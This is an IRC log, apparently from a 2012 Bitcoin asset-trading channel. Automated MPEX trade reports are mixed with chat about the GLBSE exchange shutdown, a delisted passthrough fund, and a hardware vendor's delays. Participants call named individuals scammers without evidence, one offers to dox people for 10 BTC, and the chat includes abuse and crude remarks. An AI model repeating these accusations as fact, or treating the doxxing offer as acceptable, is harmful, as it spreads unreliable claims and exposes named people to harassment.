@ 0.00051887 = 8.4389 BTC [-] **** BEGIN LOGGING AT Fri Dec 7 09:15:27 2012 Dec 07 09:31:44 [MPEX] [S.MPOE] 1500 @ 0.00052276 = 0.7841 BTC [-] Dec 07 09:32:20 [MPEX] [S.MPOE] 7700 @ 0.00052935 = 4.076 BTC [+] Dec 07 09:32:21 [MPEX] [S.MPOE] 13900 @ 0.00052939 = 7.3585 BTC [+] Dec 07 09:42:25 [MPEX] [S.MPOE] 321 @ 0.00052276 = 0.1678 BTC [-] Dec 07 09:44:34 [MPEX] [S.MPOE] 2479 @ 0.00051343 = 1.2728 BTC [-] Dec 07 09:45:26 [MPEX] [S.DICE] 440 @ 0.00335242 = 1.4751 BTC [+] Dec 07 09:50:57 [MPEX] [S.MPOE] 1842 @ 0.00051343 = 0.9457 BTC [-] Dec 07 09:50:59 [MPEX] [S.MPOE] 20732 @ 0.00051325 = 10.6407 BTC [-] Dec 07 10:03:40 [MPEX] [S.MPOE] 4150 @ 0.00052923 = 2.1963 BTC [+] Dec 07 10:04:34 man Dec 07 10:04:40 I should get some sort of award manufactured Dec 07 10:04:54 some sort of giant gold plated popped popcorn kernel Dec 07 10:05:02 ? Dec 07 10:05:10 so I can hand it to BFL Dec 07 10:05:16 whut they do now ? Dec 07 10:05:23 not ship. Dec 07 10:05:25 and lie. Dec 07 10:05:29 and then not ship again Dec 07 10:05:32 and then more lying Dec 07 10:05:36 and then lying about the lying Dec 07 10:05:37 wasnt that last time too? Dec 07 10:05:40 and then not shipping again Dec 07 10:05:52 and lying about the continued state of lying and shippingness Dec 07 10:05:57 lol Dec 07 10:06:05 u sound mad :P Dec 07 10:06:12 not sure why. as if they lied.. and didnt ship Dec 07 10:06:13 :P Dec 07 10:06:29 oh Im not mad Dec 07 10:06:34 infact I find the whole thing hilarious Dec 07 10:06:37 I told people not to buy from BFL Dec 07 10:06:49 Im the only voice of reason most of the time Dec 07 10:06:52 people ignored me Dec 07 10:07:05 so all I get to do is laugh Dec 07 10:08:57 hehe Dec 07 10:09:12 i couldnt make the kidna risk that bfl required Dec 07 10:09:40 ?? timeframe Dec 07 10:09:45 to ??? get your product Dec 07 10:11:51 Arf Dec 07 10:12:39 Making manual payments to BTC-BOND/KRAKEN holders for the last weeks and repurchase. Dec 07 10:12:42 Damn. Dec 07 10:13:33 Got to send them a customized email stating from which address I sent it so they know it's from me and for what since GLBSE payout address is shared. Dec 07 10:13:50 As well as remove them from the mailing list and update spreadsheets. Dec 07 10:14:04 On top of calculating what to pay to each of them. Dec 07 10:14:12 yeah Dec 07 10:14:19 thats why a claim system is nicer Dec 07 10:14:24 even if your shutting down Dec 07 10:14:30 Major pain and error prone. Dec 07 10:14:37 It's not too bad either. Dec 07 10:14:46 >,> .. just being honest, not necessarily plugging Dec 07 10:15:15 I use a spreadsheet to track claims against the list. Once people confirm, I consider shares claimed. Dec 07 10:15:59 great thing about the claim system, is when you pay divvies, it pays them out to holders, and to claims pending Dec 07 10:16:15 so you dont have to track divs for unclaimed shares Dec 07 10:16:26 but you can go in and update/change it at any time Dec 07 10:16:38 "manage" the claims even Dec 07 10:16:51 A bit too late for that. Dec 07 10:16:51 so if you buy someone out, you can just mark a claim as claimed and close it Dec 07 10:18:27 if I can help someone out, thats the idea. off of something thats just being shut down I dont make anything. Dec 07 10:18:36 Would just rather see the site be usefull in someway to someone Dec 07 10:18:44 I only hope one thing... that google drive doesn't fail me and lose the spreadsheets Dec 07 10:18:57 shouldnt.. backup just in case Dec 07 10:19:08 I'd have to track back all paid out people from payments I sent out. Dec 07 10:19:36 I already have google drive program backing to my PC. Dec 07 10:20:40 Should be fine and at worst, I can see all the payments in the blockchain sent from my personal address. Dec 07 10:21:00 just keep a copy iand you wont have to worry abou tit Dec 07 10:21:56 Too much work, I'd have to make a copy whenever I update the spreadsheets. Dec 07 10:22:24 There's already the payment sent out on the blockchain as fallback data. Dec 07 10:22:55 My BTC address and GLBSE associated address are easy to check for transactions. Dec 07 10:23:54 >google drive Dec 07 10:23:55 >fail Dec 07 10:23:57 quat? Dec 07 10:25:17 You never know when the 1 every 10 year total failure in a Google service might occur. Dec 07 10:25:42 But yes, unlikely. Dec 07 10:26:46 Namjies: no, Dec 07 10:26:48 it fails all the time Dec 07 10:26:57 they just have content on multiple continents concurrently Dec 07 10:28:16 If the redundancy works, it's not a failure... Dec 07 10:28:36 Which is the whole point of redundant systems... Dec 07 10:30:01 you missed the point Dec 07 10:30:19 Which is? Dec 07 10:30:37 failures happen all the time, its how they ahndles it that matters Dec 07 10:31:25 Yes, failure of specific hardware. But the system as a whole keeps functioning and as such didn't fail. Dec 07 10:37:32 Well damn. A good chunk done. Dec 07 10:37:53 nite Dec 07 10:38:04 anyhow so Dec 07 10:38:07 I now have two lists for DMC Dec 07 10:38:12 I should write a perl script to process these Dec 07 10:38:34 but the whole thing of opening an editor just to put like 3 lines in it? meh Dec 07 10:39:32 I just copy-paste address, email, shares Dec 07 10:39:37 into my spreadsheet Dec 07 10:39:55 yeah, fuck spreadsheets Dec 07 10:40:01 I just wanna see the accuracy of his statements Dec 07 10:58:36 [MPEX] [S.MPOE] 9964 @ 0.00051825 = 5.1638 BTC [-] Dec 07 10:58:37 [MPEX] [S.MPOE] 171 @ 0.00052923 = 0.0905 BTC [+] Dec 07 10:58:38 [MPEX] [S.MPOE] 4450 @ 0.00052939 = 2.3558 BTC [+] Dec 07 10:58:39 [MPEX] [S.MPOE] 7607 @ 0.00052942 = 4.0273 BTC [+] Dec 07 10:58:40 [MPEX] [S.MPOE] 4008 @ 0.00052943 = 2.122 BTC [+] Dec 07 11:02:57 and lying about the continued state of lying and shippingness <<< theyre the bitcoin flagship corp, neh ? Dec 07 11:03:27 Namjies having fun i see. Dec 07 11:04:05 mircea_popescu: something like that Dec 07 11:07:50 [MPEX] [S.MPOE] 16520 @ 0.00052943 = 8.7462 BTC [+] Dec 07 11:07:52 [MPEX] [S.MPOE] 9843 @ 0.00052951 = 5.212 BTC [+] Dec 07 11:09:55 [MPEX] [S.DICE] 1363 @ 0.00335242 = 4.5693 BTC [+] Dec 07 11:09:56 [MPEX] [S.DICE] 2487 @ 0.00335868 = 8.353 BTC [+] Dec 07 11:13:19 [MPEX] [S.MPOE] 3257 @ 0.00052951 = 1.7246 BTC [+] Dec 07 11:13:21 [MPEX] [S.MPOE] 29843 @ 0.00052955 = 15.8034 BTC [+] Dec 07 11:51:54 [MPEX] [S.MPOE] 4321 @ 0.00051642 = 2.2315 BTC [-] Dec 07 11:51:55 [MPEX] [S.MPOE] 16179 @ 0.00051629 = 8.3531 BTC [-] Dec 07 12:07:21 btw, everyone knows http://oeis.org/ ? Dec 07 12:07:27 database of integer sequences Dec 07 12:07:52 yeah what about it Dec 07 12:08:27 juuust sayin. Dec 07 12:12:34 why for? Dec 07 12:13:18 for i got lost reading in there for about an hour, that' for! Dec 07 12:14:45 oh Dec 07 12:16:32 [MPEX] [S.MPOE] 4321 @ 0.00051638 = 2.2313 BTC [+] Dec 07 12:16:33 [MPEX] [S.MPOE] 7425 @ 0.00051629 = 3.8335 BTC [-] Dec 07 12:16:35 [MPEX] [S.MPOE] 22353 @ 0.00051528 = 11.5181 BTC [-] Dec 07 12:19:04 [MPEX] [S.MPOE] 4321 @ 0.00052931 = 2.2871 BTC [+] Dec 07 12:19:05 [MPEX] [S.MPOE] 2907 @ 0.00052955 = 1.5394 BTC [+] Dec 07 12:19:07 [MPEX] [S.MPOE] 8925 @ 0.0005298 = 4.7285 BTC [+] Dec 07 12:19:08 [MPEX] [S.MPOE] 30000 @ 0.00052988 = 15.8964 BTC [+] Dec 07 12:19:10 [MPEX] [S.MPOE] 18400 @ 0.00052989 = 9.75 BTC [+] Dec 07 12:19:11 [MPEX] [S.MPOE] 28600 @ 0.00053009 = 15.1606 BTC [+] Dec 07 12:19:12 [MPEX] [S.MPOE] 28100 @ 0.0005301 = 14.8958 BTC [+] Dec 07 12:19:13 [MPEX] [S.MPOE] 18500 @ 0.00053013 = 9.8074 BTC [+] Dec 07 12:19:15 [MPEX] [S.MPOE] 10900 @ 0.00053022 = 5.7794 BTC [+] Dec 07 12:19:16 [MPEX] [S.MPOE] 20388 @ 0.00053023 = 10.8103 BTC [+] Dec 07 12:19:17 [MPEX] [S.MPOE] 19450 @ 0.00053027 = 10.3138 BTC [+] Dec 07 12:19:18 [MPEX] [S.MPOE] 2600 @ 0.0005303 = 1.3788 BTC [+] Dec 07 12:19:19 [MPEX] [S.MPOE] 17831 @ 0.00053033 = 9.4563 BTC [+] Dec 07 12:19:19 [MPEX] [S.MPOE] 2600 @ 0.00053052 = 1.3794 BTC [+] Dec 07 12:19:20 [MPEX] [S.MPOE] 27900 @ 0.00053053 = 14.8018 BTC [+] Dec 07 12:19:21 [MPEX] [S.MPOE] 14100 @ 0.00053062 = 7.4817 BTC [+] Dec 07 12:19:22 [MPEX] [S.MPOE] 5000 @ 0.00053078 = 2.6539 BTC [+] Dec 07 12:19:23 [MPEX] [S.MPOE] 11991 @ 0.00053086 = 6.3655 BTC [+] Dec 07 12:19:25 [MPEX] [S.MPOE] 29556 @ 0.00053087 = 15.6904 BTC [+] Dec 07 12:19:26 [MPEX] [S.MPOE] 17684 @ 0.00053093 = 9.389 BTC [+] Dec 07 12:19:27 [MPEX] [S.MPOE] 11220 @ 0.00053094 = 5.9571 BTC [+] Dec 07 12:19:28 [MPEX] [S.MPOE] 31459 @ 0.00053102 = 16.7054 BTC [+] Dec 07 12:19:29 [MPEX] [S.MPOE] 12258 @ 0.00053118 = 6.5112 BTC [+] Dec 07 12:19:29 [MPEX] [S.MPOE] 44922 @ 0.00053122 = 23.8635 BTC [+] Dec 07 12:19:30 [MPEX] [S.MPOE] 8800 @ 0.00053127 = 4.6752 BTC [+] Dec 07 12:19:31 [MPEX] [S.MPOE] 46588 @ 0.00053134 = 24.7541 BTC [+] Dec 07 12:22:28 http://www.huffingtonpost.com/2012/12/07/japan-earthquake-2012_n_2255699.html Dec 07 12:24:56 [MPEX] [O.BTCUSD.C120T] 1000 @ 0.16798544 = 167.9854 BTC [-] Dec 07 12:25:06 [MPEX] [O.BTCUSD.C130T] 1000 @ 0.13806513 = 138.0651 BTC [+] Dec 07 12:25:49 [MPEX] [O.BTCUSD.C140T] 1000 @ 0.10442777 = 104.4278 BTC [+] Dec 07 12:29:08 what, the peak is in ?! Dec 07 12:29:29 No idea but that seems like a bad move to me Dec 07 12:30:41 possibly. Dec 07 12:31:04 if it ends up over 16 those c140t lose money for sure. Dec 07 13:09:27 http://imgur.com/r/WTF/f4DMU Dec 07 13:13:28 [MPEX] [S.MPOE] 4321 @ 0.00052717 = 2.2779 BTC [-] Dec 07 13:13:30 [MPEX] [S.MPOE] 10529 @ 0.000527 = 5.5488 BTC [-] Dec 07 13:17:47 [MPEX] [S.MPOE] 4321 @ 0.00052724 = 2.2782 BTC [+] Dec 07 13:17:48 [MPEX] [S.MPOE] 13979 @ 0.000527 = 7.3669 BTC [-] Dec 07 13:32:28 http://www.reddit.com/r/Im14andthisisWTF/?count=25&after=t3_13s6oy Dec 07 13:32:31 er Dec 07 13:32:33 wrong ur Dec 07 13:32:37 http://i.imgur.com/rzIzI.jpg Dec 07 13:32:48 I found mircea_popescu's mouse Dec 07 13:40:06 [MPEX] [S.MPOE] 2200 @ 0.000527 = 1.1594 BTC [-] Dec 07 13:44:25 lmao Dec 07 13:52:22 [MPEX] [S.MPOE] 4321 @ 0.00053111 = 2.2949 BTC [+] Dec 07 13:52:24 [MPEX] [S.MPOE] 4629 @ 0.00053134 = 2.4596 BTC [+] Dec 07 14:21:11 [MPEX] [S.MPOE] 4321 @ 0.00052734 = 2.2786 BTC [-] Dec 07 14:21:13 [MPEX] [S.MPOE] 2467 @ 0.000527 = 1.3001 BTC [-] Dec 07 14:22:53 [MPEX] [S.MPOE] 15382 @ 0.000527 = 8.1063 BTC [-] Dec 07 14:59:12 [MPEX] [S.MPOE] 2700 @ 0.00053125 = 1.4344 BTC [+] Dec 07 15:00:57 Diablo-D3: now he knows where the clit is ... lol Dec 07 15:01:38 [MPEX] [S.MPOE] 1621 @ 0.00053125 = 0.8612 BTC [+] Dec 07 15:01:39 [MPEX] [S.MPOE] 3283 @ 0.00053134 = 1.7444 BTC [+] Dec 07 15:01:41 [MPEX] [S.MPOE] 10000 @ 0.00053142 = 5.3142 BTC [+] Dec 07 15:01:42 [MPEX] [S.MPOE] 6846 @ 0.00053173 = 3.6402 BTC [+] Dec 07 15:02:58 I was reading this drama "F.GIGA.ETF to be delisted on December 1st, 2012". mircea_popescu, looks like you pulled a glbse trick on your clients. Dec 07 15:03:08 mircea_popescu: how does it feel to mimic your greatest "enemy" :) Dec 07 15:04:48 HE CANT HEAR YOU OVER HOW BLOATED HIS WALLET IS Dec 07 15:05:38 wallet? I think it's his head, that's bloated. Dec 07 15:10:17 here we go: https://bitcointalk.org/index.php?topic=129544.0 Dec 07 15:16:26 [MPEX] [S.MPOE] 4321 @ 0.00053163 = 2.2972 BTC [-] Dec 07 15:16:27 [MPEX] [S.MPOE] 12629 @ 0.00053173 = 6.7152 BTC [+] Dec 07 15:49:58 [MPEX] [S.MPOE] 4321 @ 0.00053019 = 2.291 BTC [-] Dec 07 15:50:00 [MPEX] [S.MPOE] 13300 @ 0.00053016 = 7.0511 BTC [-] Dec 07 15:56:44 [MPEX] [S.MPOE] 4321 @ 0.00053051 = 2.2923 BTC [+] Dec 07 15:56:44 [MPEX] [S.MPOE] 11829 @ 0.00053016 = 6.2713 BTC [-] Dec 07 16:51:11 [MPEX] [S.MPOE] 4321 @ 0.00053152 = 2.2967 BTC [+] Dec 07 16:51:12 [MPEX] [S.MPOE] 925 @ 0.00053173 = 0.4919 BTC [+] Dec 07 17:18:47 [MPEX] [S.DICE] 3500 @ 0.00331829 = 11.614 BTC [-] Dec 07 17:19:32 Good afternoon Dec 07 17:20:08 good evening Dec 07 17:35:34 morning Dec 07 17:35:45 moaning Dec 07 17:43:22 [MPEX] [S.MPOE] 4321 @ 0.00053097 = 2.2943 BTC [-] Dec 07 17:43:22 [MPEX] [S.MPOE] 25879 @ 0.00053102 = 13.7423 BTC [+] Dec 07 17:43:24 [MPEX] [S.MPOE] 650 @ 0.00053173 = 0.3456 BTC [+] Dec 07 17:43:25 [MPEX] [S.MPOE] 16300 @ 0.00053173 = 8.6672 BTC [+] Dec 07 17:47:28 [MPEX] [S.MPOE] 4321 @ 0.00053036 = 2.2917 BTC [-] Dec 07 17:47:28 [MPEX] [S.MPOE] 579 @ 0.00053016 = 0.307 BTC [-] Dec 07 17:52:17 [MPEX] [S.MPOE] 4321 @ 0.00053171 = 2.2975 BTC [+] Dec 07 17:52:19 [MPEX] [S.MPOE] 12079 @ 0.00053173 = 6.4228 BTC [+] Dec 07 17:52:52 JWU42, how do you compensate shareholders, buyback at 0.06 is reasonable Dec 07 17:53:40 or is that shitty I dont want to pay back shareholders idea comming from your scammy partners Dec 07 17:54:03 hashking and harnett, both Massive SCAMMERS Dec 07 17:54:29 PsychoticBoy: JWU42 contacted me to remind me of my shares Dec 07 17:54:32 https://bitcointalk.org/index.php?topic=75867.msg1384557#msg1384557 Dec 07 17:54:47 he also contacted me Dec 07 17:55:14 but never said anything abot buyback or dividend which both must be paid Dec 07 17:57:03 [MPEX] [S.MPOE] 4321 @ 0.00053019 = 2.291 BTC [-] Dec 07 17:57:05 [MPEX] [S.MPOE] 4442 @ 0.00053016 = 2.355 BTC [-] Dec 07 17:57:05 [MPEX] [S.MPOE] 24621 @ 0.0005286 = 13.0147 BTC [-] Dec 07 17:57:32 I got the idea that most BIG glbse players such as YABMC (JWU42 and scammy friends) and GIGAMINING (gigavps) do not intent to pay Dec 07 17:58:50 and they were the ones cashing in big time, our money Dec 07 17:59:34 it's pretty easy to point at other people and call them scammers after you give them your bitcoins Dec 07 17:59:40 i've noticed this Dec 07 18:00:24 resolving the matter privately, amicably; that's difficult Dec 07 18:00:36 I own 3 companies on GLBSE Dec 07 18:01:24 [MPEX] [S.MPOE] 4321 @ 0.00052871 = 2.2846 BTC [+] Dec 07 18:01:24 [MPEX] [S.MPOE] 279 @ 0.0005286 = 0.1475 BTC [-] Dec 07 18:01:25 [MPEX] [S.MPOE] 6250 @ 0.00052717 = 3.2948 BTC [-] Dec 07 18:01:27 [MPEX] [S.MPOE] 21965 @ 0.000527 = 11.5756 BTC [-] Dec 07 18:01:30 2 are continuing on another exchange and 1 has a good buyback so....... this is not difficult to deal with Dec 07 18:10:55 so, gigavps has earned his scammer tag finally? Dec 07 18:11:05 lol Dec 07 18:11:31 damn giga you scammin still? Dec 07 18:11:31 gigascammer, one billion scams :p Dec 07 18:12:03 gigavps these gpus I bought a year ago were not as described Dec 07 18:12:04 i need a refund Dec 07 18:12:14 no problem jcpham, talk with my lawyer Dec 07 18:12:27 ugh Dec 07 18:12:36 we aren't friends anymore Dec 07 18:12:39 stop talking to me Dec 07 18:12:40 who is your lawyer? What's his name? Dec 07 18:13:13 EskimoBob, for someone who is on the internet a lot, you sure have trouble finding information Dec 07 18:13:18 what's your name? Mister "all so fkn legal" now Dec 07 18:13:30 gigavps: is it possible, that I have better thing to do? Dec 07 18:13:45 I know his names Dec 07 18:13:46 guess not, your sitting here talking with me Dec 07 18:13:46 10btc Dec 07 18:13:50 than dox your hairy scammer ass... Dec 07 18:13:51 LOL Dec 07 18:13:54 10btc I spill all the beans Dec 07 18:14:04 it's not hard to dox me Dec 07 18:14:12 I'll tell you what I know about trendon too Dec 07 18:14:12 and azelphur Dec 07 18:14:16 he's a cohort Dec 07 18:14:48 looks like mircea has pulled a "glbse" on his super duper exchange and fucked all the pt holders Dec 07 18:15:33 was'nt he establishing some type of a court or some other shit for justice? Dec 07 18:16:03 yep Dec 07 18:16:05 can he be the first client of his own court? LOL Dec 07 18:16:05 and i'm the guy Dec 07 18:16:13 what guy? Dec 07 18:16:13 i'm judge number 1 Dec 07 18:16:25 so you are scammer too? Dec 07 18:16:28 so let's all be nice Dec 07 18:16:46 what "glbse"? weren't you warned well in advance? Dec 07 18:17:04 ohai EskimoBob :P Dec 07 18:17:25 fuck your toy court and every ass hat judge there :) LOL Dec 07 18:17:28 I saw your posts on the forums (just recently started looking at them) and knew I recognized it Dec 07 18:17:44 Ukto: hola Ukto Dec 07 18:18:02 EskimoBob has a special language he uses when posting on the forums Dec 07 18:18:06 what post? the left one or the one on the right side? Dec 07 18:18:16 any of them lol Dec 07 18:18:17 you can call me an asshat, but calling it a toy-court and implting that i'm not impartial is incorrect Dec 07 18:18:25 you should know your place EskimoBob Dec 07 18:18:27 it's a mix between angry and incoherent Dec 07 18:18:33 the mods whitelisted me.. but I still cant post for some reason. lol Dec 07 18:18:35 respect my authorital! Dec 07 18:18:35 I can pm ppl at least Dec 07 18:18:40 jcpham: know my place? LOL Dec 07 18:18:44 look who's talking Dec 07 18:18:49 EskimoBob: you know where you live? Dec 07 18:18:51 :P Dec 07 18:19:07 hugs Dec 07 18:19:07 yes I do know where I live Dec 07 18:19:16 then you know your place? :P Dec 07 18:19:18 the land of snow and ice Dec 07 18:19:19 i know my place well Dec 07 18:19:31 :P Dec 07 18:20:19 so how is this toy court going to work? Dec 07 18:20:26 fuck if i know Dec 07 18:20:51 i imagine with mircea_popescu though stripper will be involvewd Dec 07 18:21:06 ROFLOL Dec 07 18:21:09 man Dec 07 18:21:21 thats 2 diff ppl making an MP + stripper reference around me in 24hrs Dec 07 18:21:28 so it's just another virtual circle jerk? Dec 07 18:21:54 Ukto: you see, mircea is old and ugly and only way he gets any is if he pays Dec 07 18:22:09 forget the old part Dec 07 18:22:14 you see, I don't know, so I'm just joking around Dec 07 18:22:23 like i don't have some fucking attitude problem Dec 07 18:22:29 like other people Dec 07 18:22:38 hwo do you know that? Dec 07 18:22:43 how* Dec 07 18:22:45 i hope you die Dec 07 18:22:46 although, I was reading hte post guruvan vs mpoe-pr... reeses made a point that if a normal stock was delisted, its value is generally trashed for the reason it was delisted.. but in this case.. the stock/s were not "delisted" for reasons of financial stability.. thus, if a stock like AAPL (exmaple) were delistd due to the xchange shutting down, it still has value, right? Dec 07 18:22:59 you see, you do have a problem :) Dec 07 18:23:03 i didn't Dec 07 18:23:06 :) Dec 07 18:23:45 i saw a triple rainbow Dec 07 18:23:53 why do birds suddenly appear, evertime you are near Dec 07 18:24:14 triple? damn I have seen this only once Dec 07 18:24:34 if f.giga.etf is supposed to have some value, why nobody asked mircea to arrange buyback on december 1st? Dec 07 18:24:55 https://sphotos-a.xx.fbcdn.net/hphotos-snc7/381684_3379379022419_161806938_n.jpg Dec 07 18:24:57 well namjies did Dec 07 18:25:02 go home rainbow, you are drunk Dec 07 18:25:09 jurov: as of now, MP is of the opionion it has no value Dec 07 18:25:12 since it was delisted Dec 07 18:25:20 regardless of the reason for delisting Dec 07 18:25:41 what exactly was f.giga.etf Dec 07 18:25:41 and he doesnt believe he should have to submit his claim to gigavps, thus will not Dec 07 18:25:46 was apassthrough Dec 07 18:25:47 who was the asset issuer, step one Dec 07 18:25:50 of giga from GLBSE Dec 07 18:25:53 by MP Dec 07 18:25:57 delisted usually never equals "no value" Dec 07 18:26:05 he bought shares of giga from giga direct? or on glbse Dec 07 18:26:15 and re-posted them on Mpex Dec 07 18:26:19 so MP was the asset issuer of f.giga.etf Dec 07 18:26:19 as re-issuer Dec 07 18:26:19 yes Dec 07 18:26:25 and what was the function of it Dec 07 18:26:31 passthrough Dec 07 18:26:38 to glbse? Dec 07 18:26:40 yes Dec 07 18:26:40 sold this shit to others and now tells everyone, it has no value (and deletes the security) :) Dec 07 18:26:44 WTF Dec 07 18:26:50 hold on, i have seen this before! GLBSE! Dec 07 18:26:50 yeah Dec 07 18:26:52 you guys are all scandalous Dec 07 18:26:53 LOL Dec 07 18:26:58 not me Dec 07 18:27:04 no me Dec 07 18:27:04 I have only stated non scanalous things Dec 07 18:27:06 and made comments Dec 07 18:27:09 that MIGHT be Dec 07 18:27:10 :P Dec 07 18:27:12 me too Dec 07 18:27:26 only facts Dec 07 18:28:00 I am just trying to est. real world happenings vs "financially uneducated" as "mpoe-pr" is calling everyone Dec 07 18:28:24 mpoe-pr is lunatic and a spammer Dec 07 18:28:37 i like her boobs Dec 07 18:28:43 A. MP/OE states that stocks were delisted from glbse, and therefore worthless. Thats the real financial market. However, if NYSE shuts down, MSFT shares are not worthless. Dec 07 18:29:08 B. Acting as a passthrough for shares to giga, means to buy/sell, and claim when need be. Dec 07 18:29:11 Ukto: she is a not as smatr as she thinks. Dec 07 18:29:33 though I guess no where MP laid out any responsibilities to do such Dec 07 18:29:36 well it seems to me that f.giga.etf totally depends on data from glbse Dec 07 18:29:46 measured, tracked, statistical data Dec 07 18:29:49 ans she has some serious attitude problems. She ws involved in some spamming scams etc Dec 07 18:29:51 so it oculd fall on the shareholders shoulders for not requiring a "detailed contract" from MP of responsibilities Dec 07 18:29:56 which doesn't exist or may not Dec 07 18:30:16 gigavps: was your asset backed by hardware ? Dec 07 18:30:24 i could look it up but I think your here :P Dec 07 18:30:30 well it was backed by hashes Dec 07 18:31:01 pigeons: some ppl say that worst case scenario the would sell hardware to take care of shareholders, since thats where the btc was spent Dec 07 18:31:23 the contract was you get the proceeds of 5 mhash per share Dec 07 18:31:43 and he intends to continue despite being glbsed Dec 07 18:31:49 giga? Dec 07 18:31:51 yes Dec 07 18:31:56 i thoguht he was just closing ? Dec 07 18:31:59 no Dec 07 18:32:02 not closing Dec 07 18:32:29 then Dec 07 18:32:36 that means that the claims woudl earn the passthrough fund dividends Dec 07 18:32:36 to claim Dec 07 18:32:38 and continue on Dec 07 18:32:45 and regardless of glbse going down Dec 07 18:32:50 correct Dec 07 18:32:50 those share values on the passthrough should remain Dec 07 18:32:52 and remain tradeable Dec 07 18:32:58 (my opinion) Dec 07 18:33:02 but Dec 07 18:33:06 giga has to actually do his part Dec 07 18:33:13 well mircea_popescu claims that "he always stated" that he intended the passthrough to be zero work/maintenance Dec 07 18:33:16 and MP has to do his part on behalf of the PT Dec 07 18:33:20 i see everything you guys are saying but isn't it a huge pain in the ass for MP to operate his etf without any information Dec 07 18:33:23 forthwith Dec 07 18:33:34 might as well just pause it or shut it down entirely Dec 07 18:33:54 MP did shut the passthrough down entirely Dec 07 18:34:45 jcpham: my view, is that as long as the shares receive dividends, and he can distribute those to the share holders on the mpex list, then its full tradeable w/ value on mpex. no information on GLBSE is required to operate/maintain the passthrough fund. price at glbse does not matter, since it trades at its ownprice on MPEX. Dec 07 18:35:04 so neither market value, depth, or histroy on GLBSE have anything to do with an asset on MPEX Dec 07 18:35:24 right? Dec 07 18:35:24 nope Dec 07 18:35:24 unless I missed something Dec 07 18:35:24 ic i think Dec 07 18:35:32 and if gigia is just paying out divs Dec 07 18:35:33 with glbse gone MP doesnt get the dividends to pass through anymore Dec 07 18:35:48 pigeons: but he plans to pay out the divs, to those who claim Dec 07 18:35:52 as if GLBSE was still in place Dec 07 18:35:52 right? Dec 07 18:36:03 giga does, MP does not plan to claim Dec 07 18:36:07 i don't like this idea of a passthrough Dec 07 18:36:13 jcpham: agreed Dec 07 18:36:17 i never participated in anything like it Dec 07 18:36:20 MP says that making claims was not part of the deal Dec 07 18:36:22 and i don't like it Dec 07 18:36:22 it put responsibility on MP Dec 07 18:36:38 pigeons: i have not seen the contract, i dont think. but he may be partially correct Dec 07 18:36:48 it wasn't mentioned Dec 07 18:36:53 if MP never promised to 'care for' the the passthrough Dec 07 18:37:00 "it is what it is, good luck" type of thing Dec 07 18:37:16 and that is what it seems to me Dec 07 18:37:24 he did make public statements that he would not do any further work other than paying dividends Dec 07 18:37:24 it is what it is Dec 07 18:37:24 thats the investors fault I think Dec 07 18:37:28 yes in the end, its gone Dec 07 18:37:31 for trusting MP to do what they think is the right hting Dec 07 18:37:59 without a written out obligation Dec 07 18:38:21 pigeons: he removed all records of the asset from accounts though, is my udnerstanding Dec 07 18:38:24 how could he payout divs? Dec 07 18:38:40 i mean before the glbse closure Dec 07 18:38:44 ah Dec 07 18:39:04 [MPEX] [S.MPOE] 4321 @ 0.00053141 = 2.2962 BTC [+] Dec 07 18:39:05 [MPEX] [S.MPOE] 11760 @ 0.00053173 = 6.2531 BTC [+] Dec 07 18:39:17 yeah, he suggested I do a passthough of mpex on Bitfunder.. i think I will def. avoid it now Dec 07 18:39:28 jsut because I dont want to end up in a similar situation Dec 07 18:39:46 not that I would have a hard time spending a little effort to make shareholders "Customer" happy Dec 07 18:39:52 even if its ot required Dec 07 18:40:06 i think more effort would go into fighting it anyways Dec 07 18:40:17 yeah i figured originally i would have an easier time getting GIGA divdends from MP than from nefario if GLBSE went south, and I was wrong, but oh well Dec 07 18:40:38 about a month ago MP made it clear this is what would happen and so i sold the rest Dec 07 18:42:50 regardless, just because he may not feel, because it is not written down, that he has an obligation to the shareholders to "try" to take care of them, does not mean that people do not have the right to issue a scammer tag, for not "Trying", since he did not explicitly write that he woudl NOT adminitrate the account beyhond divs. (unless he did?) Dec 07 18:43:19 *ignore mass mispells Dec 07 18:43:35 boring Dec 07 18:43:53 yes. yes I am Dec 07 18:43:54 :P Dec 07 18:43:54 ;) Dec 07 18:44:01 no the subject :) Dec 07 18:44:33 btw, anyone had contact with tcatm in the last 12 weeks he dissapeared from irc? Dec 07 18:44:54 I tried emailing him a few times, and no response et all :/ Dec 07 18:46:48 new topic.. hmm Dec 07 18:47:03 oh pigeons: while we are such an upbeat news for asset exchanges.. Dec 07 18:47:07 any thoughts for bitfunder? :P Dec 07 18:47:19 Other than "please dont screw the customers" ? Dec 07 18:51:22 talked to nefario. Some retard is calling him every day and is leaving really ugly messages to his voice mail. Who ever you are, you are not helping at all. Damn fuckwits Dec 07 18:51:30 no i dont have a lot of thoughts right now Dec 07 18:51:43 hahah i would have thought it was you Bob Dec 07 18:53:30 EskimoBob: LOL Dec 07 18:53:45 prolly that kid from china Dec 07 19:18:48 so dick shaped ppl hows life Dec 07 19:19:43 I am also going to rent a ¨WALL¨ around me :D hehe seems to work Dec 07 19:19:46 super swell Dec 07 19:20:06 jolly good Dec 07 19:21:14 Ukto, how it stands, for now, ppl would like to see me move to bitfunder Dec 07 19:21:31 is it live yet? Dec 07 19:21:36 yes Dec 07 19:21:44 [MPEX] [S.MPOE] 12500 @ 0.00053075 = 6.6344 BTC [-] Dec 07 19:21:45 [MPEX] [S.MPOE] 4180 @ 0.00053173 = 2.2226 BTC [+] Dec 07 19:22:39 been going back and fourth on a final decision on microtime Dec 07 19:23:49 hehe thanks kako :) Dec 07 19:23:56 np Dec 07 19:24:05 what about microtime Dec 07 19:24:08 though i never saw the habelockinvestments.com url before since it goes off of my window lol Dec 07 19:24:48 i have an AI field for the trades that has no particular purpose since the system uses its own trade txn id. was debating using that Dec 07 19:25:09 but one of my biggest security bugs, is I don't like giving any information that cold tie anything directly from the outside world to the db Dec 07 19:25:18 well, the id is used internally to reference the txn id Dec 07 19:25:28 this is for tweet uniqification? Dec 07 19:25:39 not "bugs" but, things that bug me Dec 07 19:25:40 lol Dec 07 19:25:46 yeah, tweet/json trades Dec 07 19:25:49 as a uniqe counter Dec 07 19:26:02 think I will just put a microtime field on Dec 07 19:26:05 so time+microtime Dec 07 19:26:06 well, if its a 'counter' than just ++ Dec 07 19:26:36 for security reasons, I just dont feel like showing those numbers to the public hehe Dec 07 19:26:43 "pigeons | hahah i would have thought it was you Bob " - LOL :) I do not do crap like that. Dec 07 19:26:52 then again, if someone has the time/microtime, it wouldnt be hard to locate the record anyways in teh table if that was the point Dec 07 19:27:18 just my design musings outloud. :) Dec 07 20:08:14 [MPEX] [S.MPOE] 4321 @ 0.00053162 = 2.2971 BTC [-] Dec 07 20:08:16 [MPEX] [S.MPOE] 5681 @ 